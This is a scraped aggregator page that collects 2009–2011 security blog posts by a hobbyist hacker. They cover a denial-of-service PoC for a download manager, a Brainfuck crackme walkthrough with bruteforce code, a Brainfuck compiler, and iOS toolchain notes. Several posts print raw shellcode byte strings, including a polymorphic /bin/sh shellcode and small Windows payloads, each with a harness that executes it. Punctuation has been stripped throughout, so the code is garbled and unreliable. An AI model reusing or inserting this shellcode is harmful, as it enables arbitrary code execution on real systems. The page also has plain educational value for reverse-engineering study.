Sp2By: AodrulezThis download manager crashes completely when the attachedspeciallycrafted files' contents are copied to System clipboardTo do thistask,I've coded a simple app in Pure Masm32 Usage:Start Winget,minimize its window et then run the applicationMake sure thatWingetpoctxt lies in the same folder asmy exploit PoC appYou canalso open the file et do a ctrl-A et thenctrl-c n see Winget crashPoC:http://wwwsnapdrivenet/files/571814/wingetkillerrarGreetz fly out to:1LiquidWorm : For being so nicen guiding me:2str0ke : For goin thru all my silly e-mails3Amforked : Mymentor4OSRT :- This is dedicated to all the members------------------------------------------------------------------By:Aodrulez, wwwOrchidSevencom, aodrulezblogspotcomEmail: f3arm3d3ar@gmailcomhttp://www.secuobs.com/revue/news/58453.shtmlhttp://www.secuobs.com/revue/news/58453.shtml http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2011-10-18 16:17:41 - Aodrulez : Creating your own Abstract ProcessorView more documents from Aodrulez http://www.secuobs.com/revue/news/335415.shtmlhttp://www.secuobs.com/revue/news/335415.shtml Secuobs.com : 2011-09-01 18:46:55 - Aodrulez - The Code Aodrulez's Brainfuck Crackme V1 ------------------------------------------------- Its very Easy ---------- -- ,,,,,,- -- --- ------- ----------------- --------- Lets split it into interesting parts As we know, in brainfuck input is taken by the ',' character output is given by the '' character If you've compiled tried the crackmeit simply asks for a Serial Based on what you enterit'll decide if it is correct or not Greatso lets locate the part where it accepts our serial Analysis In the 4th line of the code, we can see that its takin 6 bytes of input ,,,,,, Prior to that the code is Which obviously is printing Serial 9 bytes exactly Lets see what happens after the input -- point to the next memory location last char - decrement the value at that location ---------- -- DOnt believe me No worriestry running it in a Brainfuck interpreter onlineright here http wwwiamcalcom misc bf_debug Am sure the above code prints Serial Now lets analyse the above code increment the memory pointer put 10 at that location run this loop ten times What the loop does is that it'll put the ascii codes of the characters you want to print in consecutive memory locations ---------- -- Print the string Now lets look at the last part of the crackme's code where it obviously has to print a good-boy string Starting from the end of its code Print the good boy string -- --- ------- ----------------- --------- then the part where it substracts the ascii code values between the last 2 charactersSo what exactly is happening instruction will again make it point to the last characterThusthe number of iterations for the While loop that prints the good-boy message depends upon the ascii value of the last character If you remember usually the correct value for the while-loop to print is 10Lets check if our assumption is right or not -- --- ------- ----------------- --------- This was the original code lets run it in the online interpreter see the outputyou do get an output but its gibberish Now add this to the begining see what happens move to the next mem location put a value of 10 thereThe first part of the crackme's code itself when it tries to print Serial When you try to run thatyou get this string - Congratulations So thats perfect The algo is pretty simple a valid serial should be 1 6 chars long 2 The last character's ascii code should be 10 units more than the second-last character For Ex aaaaak bbbbbl cccccm abcdeo ABCDEO Thats all c Aodrulez http://www.secuobs.com/revue/news/326538.shtmlhttp://www.secuobs.com/revue/news/326538.shtml Secuobs.com : 2011-09-01 11:02:28 - Aodrulez - Hola Amigos This is a tutorial explaining some old school orc inspired reversing cracking techniques Today, our target application is a crackme that i wrote a few days ago in an esoteric language named 'Brainfuck'The code of the crackme can be found here http aodrulez110mbcom crackmetxt But before we begin our reversing tutorial, let me show you how to compile this code make our crackme applicationIn my previous post, i've provided the source code of my 'Brainfuck Pseudo Compiler'You can compile this crackme using this compilerFirst of all, compile the 'Brainfuck Pseudo Compiler' as follows aodrulez pwn4g3 muse gcc bfcc -o bfc Here am assuming you've copied the code of my compiler into a file named 'bfcc'Once this is done, you should have an executable named 'bfc' which is our brainfuck compilerNow lets compile the crackmeCopy the contents of the above link to a file named 'crackmetxt'Then issue this command aodrulez pwn4g3 muse bfc crackmetxt crackme That should compile our 'crackme' for you Cracking the Code Before we do any reversing fire any of our tools, lets study the crackme firstLets try running it see what happens aodrulez pwn4g3 muse crackme Serial aaaaaa aodrulez pwn4g3 muse Now that doesnt look like a valid serial D But one important thing i observed was that it takes exactly '6' bytes characters for the serial Not a byte less, not a byte moreHow did i know that Try entering one character then hit enter see what happens keep on doin this until you get an output remember that even 'enter' or Line-Feed is a char Now, lets think about it is there a way to find out the valid serial without even looking at the algorithm ofcourse there is the magic word for you is'bruteforce'There are times when the algo involved is so complicated that its very tough to reverse it find a valid serialIn such caseswhen you have no other choice left you can always try bruteforce The truth though is that its an ugly way of doing thingsWhy Lemme explain Lets say we have a serial the length of which is 1 characterHow many possible values can it have If its only alphabets 26 AlphaNumeric 36 CaseSensitive Alphanumeric 26 26 10 62 What do these numbers mean if the password is just alphabets case insensitive the maximum number of possible right answers is 26So, i hope its understood that if i try all of these 26 possible values, am sure to get the right passwordBut, if the password is 2 characters in size, the max possible combination becomes 26 26or 26 2 676 Pure PermutationNow thats pure bruteforce attempt Alrighty now how to implement a custom bruteforce tool for our particular crackme As we know already the crackme needs an input So lets try this command in a linux terminal aodrulez pwn4g3 muse echo aaaaaa crackme what this'll do is it'll first echo aaaaaa to the screen but the redirection symbol tells it to pipe the output to the command specifiedin this case to crackme executableThis trickcombined with some programming skills can be turned into a sort of bruteforce attack So here am providing a very ugly bruteforce-algorithm that i just wroteits uglynot optimizedbut sure as hell worksHere we go - Bruteforce COde version 10 include include int main char b 7 b 6 ' 0' char brute 50 int p,q,r,s,t,u p q r s t u 97 for p 97 p ---------- -- ,,,,,,- -- --- ------- ----------------- --------- http://www.secuobs.com/revue/news/326450.shtmlhttp://www.secuobs.com/revue/news/326450.shtml Secuobs.com : 2011-08-28 22:56:03 - Aodrulez - Hola Being down with fever has its own fun Was bored wid my mundane stuff there was no way i could go outThats when i heard about 'Brainfuck'Found it interesting hence ended up writing a Pseudo compiler for itAm calling it a pseudo compiler because this will only parse pureBrainfuck code to equivalent fully working 'c' code then it uses gcc tocompile it into an executableIt does no syntax checking as of now expects the Brainfuck code to be perfect Tried testedthe code is fully functionalIt might be vulnerable to buffer overflow attacks here n therebut rightnow am too lazy to fix it Brainfuck Pseudo Compiler v10 ------------------------------ Author Aodrulez Blog http aodrulezblogspotcom Compilation gcc bfcc -o bfc Usage bfc source target Example bfc gamebf game Note 'source' file should contain valid Brainfuck code Extensions of the files dont matterIf no 'target' name is specified, the output will be 'aout' include include include void parse char ifname , char ofname char ch char make 1024 strcpy make , gcc tmp a0dc -o FILE source , target source fopen ifname , r if source NULL printf Cannot open source file n exit 0 target fopen tmp a0dc , w if target NULL puts Cannot create target file n fclose source exit 0 fprintf target , include n fprintf target , int main void n fprintf target , int x 0 n fprintf target , char ram 65535 n fprintf target , while x' fprintf target , x n break case '' fprintf target , --x n break case ' ' fprintf target , ram x n break case '-' fprintf target , --ram x n break case '' fprintf target , putchar ram x n break case ',' fprintf target , ram x getchar n break case ' ' fprintf target , while ram x n break case ' ' fprintf target , n break default break fprintf target , n fclose source fclose target if ofname NULL system gcc tmp a0dc else strcat make , ofname system make int main int argc , char argv if argc 2 printf n Brainfuck Pseudo Compiler n ------------------------- n printf Author Aodrulez n Blog http aodrulezblogspotcom n printf n Usage pourcentss source target n Ex pourcentss testbf testout n n , argv 0 , argv 0 else parse argv 1 , argv 2 return 0 http://www.secuobs.com/revue/news/325669.shtmlhttp://www.secuobs.com/revue/news/325669.shtml Secuobs.com : 2011-07-02 13:02:19 - Aodrulez - Hi there Its been a long time since I've made a blog post well its about time i guess Installing PDP11 SIMH Simulator on IOS device---------------------------------------------------------------------- This should work on iPhone,iPod as well as iPadI've got it working on iPod Touch 4G runningIOS 433 Latest as of now Btw, there are 2 ways of doing this If you own a Mac have the IOS SDK you can do it right onyour computer Since am a Linux guy find itcompletely weird to own a Mac just to programfor a teeny-weeny iDevice, i installed the entiretoolchain on my iPod Touch itself Bwahaha Install Toolchain on your Jailbroken iDevice --------------------------------------------------------------- Credits 'MichaelHaseth' from iFanscom Tnx a ton Michael Install 'fake-libgcc' from Cydia Install 'GNU C Compiler' from Cydia Copy the attached libraries to ' usr lib ' of your iDevice Install 'iPhone 20 Toolchain' from Cydia Thats all Just ssh to your iDevice type 'gcc' you aregood to go You can use the Mobile-Terminal too Note I've gotten normal c programs to compile run just fine use gcc sourcec -o app app Installing SIMH PDP11 Simulator----------------------------------------------- Unpack copy the attached header files to ' usr lib' of your iDevice Unpack the attached simhzip on your computer transfer it to a folder on your iDevice For ex tmp 'cd' to that folder type 'make' at the prompt It'll take a few seconds to build once its done, inside the 'BIN' folder, you'll find the pdp11 executable Just copy the required unix OS images to the folder you've got a working pdp11 unix computer on your iDevice Note I've modified the SIMH makefile tweaked a few things here there Am not uploading the unix images cuz of the copyright biaches Just lookup on any SIMH tutorial you are good to go Attachments -------------------1 gcc_headerszip2 headers3 SIMH-Modified c Aodrulez http://www.secuobs.com/revue/news/314876.shtmlhttp://www.secuobs.com/revue/news/314876.shtml Secuobs.com : 2011-03-05 19:25:44 - Aodrulez - include include Aodrulez's bin sh Null-Free Polymorphic Shellcode Shellcode size 46 bytes Special Tnx to 'Chema Garcia aka sch3m4 ' Tested on Ubuntu 804,Hardy Heron Email f3arm3d3ar at gmailcom Author Aodrulez Atul Alex Cherian Blog Aodrulez blogspotcom char code xeb x12 x31 xc9 x5e x56 x5f xb1 x15 x8a x06 xfe xc8 x88 x06 x46 xe2 xf7 xff xe7 xe8 xe9 xff xff xff x32 xc1 x32 xca x52 x69 x30 x74 x69 x01 x69 x30 x63 x6a x6f x8a xe4 xb1 x0c xce x81 int main int argc, char argv fprintf stdout, Aodrulez's Linux Polym0rphic Shellc0de nShellcode Size pourcentsd bytes n ,strlen code void code return 0 Greetz Fly Out to - 1 Amforked My Mentor 2 TheBlueGenius My Boss - 3 wwworchidsevencom 4 wwwisacorgin 5 wwwMalconorg - World's first Malware Conference http://www.secuobs.com/revue/news/289654.shtmlhttp://www.secuobs.com/revue/news/289654.shtml Secuobs.com : 2009-11-12 16:35:09 - Aodrulez - Size 16 Bytes, Null-FreeAuthor Aodrulez Email f3arm3d3ar gmailcom Shellcode xB9 x38 xDD x82 x7C x33 xC0 xBB xD8 x0A x86 x7C x51 x50 xFF xd3 ---------------- Description ---------------- I've used a Function called FatalAppExit fromkernel32dllThe Benefits are Three-Fold 1 Displays a MessageBox2 Terminates the Process 3 Its there in Kernel32dll itself -------------- Asm Code -------------- shellcode mov ecx,7c82dd38h Admin string in mem xor eax,eax mov ebx,7c860ad8h Addr of FatalAppExit push ecx function from Kernel32 push eax call ebx App does a Clean Exit ------------------- Shellcodetestc ------------------- char code xB9 x38 xDD x82 x7C x33 xC0 xBB xD8 x0A x86 x7C x51 x50 xFF xd3 int main int argc, char argv int func func int code int func ---------------------- Greetz Fly Out To ---------------------- 1 Amforked My Mentor2 The Blue Genius My Boss3 wwworchidsevencom IMAGE http://www.secuobs.com/revue/news/160149.shtmlhttp://www.secuobs.com/revue/news/160149.shtml Secuobs.com : 2009-11-06 17:28:35 - Aodrulez - Size 12 BytesAuthor Aodrulez Email f3arm3d3ar gmailcomMilw0rm wwwmilw0rmcom author 1620 Shellcode x68 x97 x4C x80 x7C xB8 x4D x11 x86 x7C xFF xD0 ------------------- Shellcodetestc ------------------- char code x68 x97 x4C x80 x7C xB8 x4D x11 x86 x7C xFF xD0 int main int argc, char argv int func func int code int func ---------------------- Greetz Fly Out To ---------------------- 1 Amforked My Mentor2 The Blue Genius My Boss3 Todd Packetstormsecurityorg Staff Tnx a Ton fellas 3 wwworchidsevencom4 wwwisacmorgin --------------- References --------------- 1 http packetstormsecurityorg filedesc wordpad-shellcodetxthtml2 http wwwshell-stormorg shellcode files shellcode-513php IMAGE http://www.secuobs.com/revue/news/158245.shtmlhttp://www.secuobs.com/revue/news/158245.shtml